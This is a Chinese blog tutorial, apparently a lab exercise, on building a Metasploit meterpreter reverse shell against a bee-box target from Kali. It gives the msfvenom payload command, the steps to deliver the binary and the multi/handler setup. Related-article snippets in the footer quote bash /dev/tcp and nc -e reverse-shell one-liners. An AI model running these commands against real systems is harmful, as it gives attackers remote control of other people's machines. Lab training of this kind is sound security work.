利用 metasploit 创建反弹 shell实验

于 2023-07-01 20:30:09 发布
阅读量357 收藏 2
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68638628/article/details/131492926
版权

目录

metasploit 简介

metasploit是一款开源的安全漏洞检测工具,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,是世界上使用最多的渗透实用程序。Metaloit的设计初衷是打造成一个攻击工具开发平台,IT专业人士借助其识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。

实验步骤

1、生成被控端并在靶机运行

①生成程序

1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.137.128 LPORT=4443 -f elf > cute_dolphin.bin

在这里插入图片描述

2.将文件复制到网站的目录(/var/www/html)下

cp cute_dolphin.bin /var/www/html

ls 查看指定目录下的所有文件
在这里插入图片描述

②启动apache2服务

启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述

③在靶机中下载

1.在bee-box的浏览器输入:192.168.137.128(kali的IP)/cute_dolphin.bin ,下载payload文件
在这里插入图片描述

2.添加执行权限

chmod +x cute_dolphin.bin

在这里插入图片描述

2、建立连接

①启动metasploit

在这里插入图片描述

②配置参数

⑴进入handler模块
use exploit/multi/handler
在这里插入图片描述

⑵设置攻击载荷
set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述

⑶设置lhost为kali的IP
set lhost 192.168.137.128
在这里插入图片描述

⑷设置lpost
set lport 4443
在这里插入图片描述

⑸运行靶机上文件,会话建立
在这里插入图片描述
在这里插入图片描述

拓展

1、查看帮助信息

msfvenom --help

在这里插入图片描述

2、查看所有可以使用的攻击模块

msfvenom -l payloads

在这里插入图片描述

3、查看攻击载荷需要设置的参数

msfvenom --list-options -p linux/x86/meterpreter/reverse_tcp

在这里插入图片描述

墨染秋瑟
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 502
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
反弹shell生成shell
专注企业信息安全-sec
12-04 950
反弹shell 0x01 bash 版本: bash -i >& /dev/tcp/attackerip/1234 0>&1 注意这个是由解析 shell 的 bash 完成,所以某些情况下不支持。我用 zsh 不能反弹。这个也是最常用的。 0x02 nc 版本: 支持 - e 选项 nc -e /bin/sh attackerip 1234 这个方式最...
Metasploit 生成***反弹shell
weixin_34372728的博客
04-27 2499
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报特点:这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的...
使用Metasploit web_delivery 反弹shell
大方子
02-07 5410
Metasploit的Web Delivery Script是一个多功能模块,可在托管有效负载的攻击机器上创建服务器。当受害者连接到攻击服务器时,负载将在受害者机器上执行。 此漏洞需要一种在受害机器上执行命令的方法。特别是你必须能够从受害者到达攻击机器。远程命令执行是使用此模块的攻击向量的一个很好的例子。Web Delivery脚本适用于php,python和基于PowerShell的应用程序。 当攻击者对系统有一定的控制权时,这种攻击成为一种非常有用的工具,但不具有完整的shell。另外,由于服务器和有效
利用Metasploit获取linux反弹shell的尝试
weixin_42324313的博客
08-19 9698
序 接《Metasploit上使用RPC方式复现一个Linux提权漏洞》。 由于刚刚入手,对很多概念和技术不慎了解,对RPC,mfsd,反弹shell等技术的理解有限,甚至有所偏差,导致前面做的探索差强人意。虽然最后建立了攻击机与靶机之间的连接,并且拿到shell和root权限,但是不能算是真正意义上的Metasploit上使用RPC方式复现一个Linux提权漏洞。 还需要继续进行探索,具体什么...
信息安全技术(二)-- 利用 metasploit 创建反弹 shell
yi23456qi的博客
06-19 490
知识是不断从学习中得到的,经验是从尝试中得到的!
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1215
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell的方法总结
m0_48520508的博客
08-26 1410
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Windows
Metasploit学习总结
马赛克的博客
04-04 603
一:前言 Metasploit是一个漏洞利用框架,我们可以获取,使用,开发,共享漏洞攻击程序,(可以根据自己的需要开发漏洞攻击程序)。 并且提供了大量的攻击载荷供我们选择,所谓的攻击载荷就是再目标计算机上实现"额外的功能",就像是回答的问题:“我已经控制了机器,还要做什么”,一般来说,最受欢迎的攻击载荷包括添加用户,开启后门,以及在目标机安装新软件。 二:使用 原则:把Metasploit...
利用 metasploit 创建反弹 shell
2301_78457119的博客
06-29 416
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。1 环境准备1.开启Kali虚拟机和bee-box靶机1.首先用 msfvenom 生成一个反弹 shell 的程序,将返回的连接地址修改为kali的 ip 地址。在 kali 中打开终端,输入:当我们在服务器。
msf之正向shell的使用
shy的博客
09-28 9166
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用正向shell,这时才发现,自己对于正向shell,一无所知。 1,生成正向shell后门文件 msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe 2,上传到目标机器上 3.配置监听(很重要) 4,运行目标机上的后门文件,获取shell 1,2是正向sh.
反弹meterpreter方法
wutiangui的博客
04-25 159
靶机执行shell.exe即可反弹meterprete。//192.168.25.128是攻击机IP。msfconsole下依次执行如下命令。启动 msfconsole。[run] 开始监听即可。
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 7069
生成木马进行植入
各种shell反弹方法
weixin_46626737的博客
05-16 2713
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Windows篇(゚益゚メ) 渗透测试
寻觅的博客
04-07 3589
文章目录反弹shell介绍常用反弹方式NetCat(NC)反弹正向NC反向NCmshta.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Cobaltstrike利用模块hta攻击源码rundll32.exe利用msf利用模块方法一(msfconsole)方法二(msfvenom)Rundll32加载htaRegsvr32.exe利用msiexec.exe利用powershell脚本绕过杀软混淆处理 反弹shell介绍 反弹shell主要就是让我们能远程连接到目标控制台并且下
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6408
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4705
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2589
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
Linux系统性能监控命令系列之 lsof
yingchao_yuan的博客
11-05 605
大家好!我是Sean! 继续咱们的Linux系统中的性能监控命令,今天要分享的是lsof。 lsof (list open files) (一个列出当前系统打开文件的工具) 在linux环境下,万物皆文件,通过文件不仅仅可以访问常规数据,还可以访问网络连接和硬件,所以如传输控制协议 (TCP) 和用户数据报协议 (UDP) 套接字等,系统在后台都为该应用程序分配了一个文件描述符,无论这个文件的本质如何,该文件描述符为应用程序与基础操作系统之间的交互提供了通用接口。因为应用程序打开文件的描述符列表提供了大量关
metasploit 反弹shell
最新发布
10-16
反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨染秋瑟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值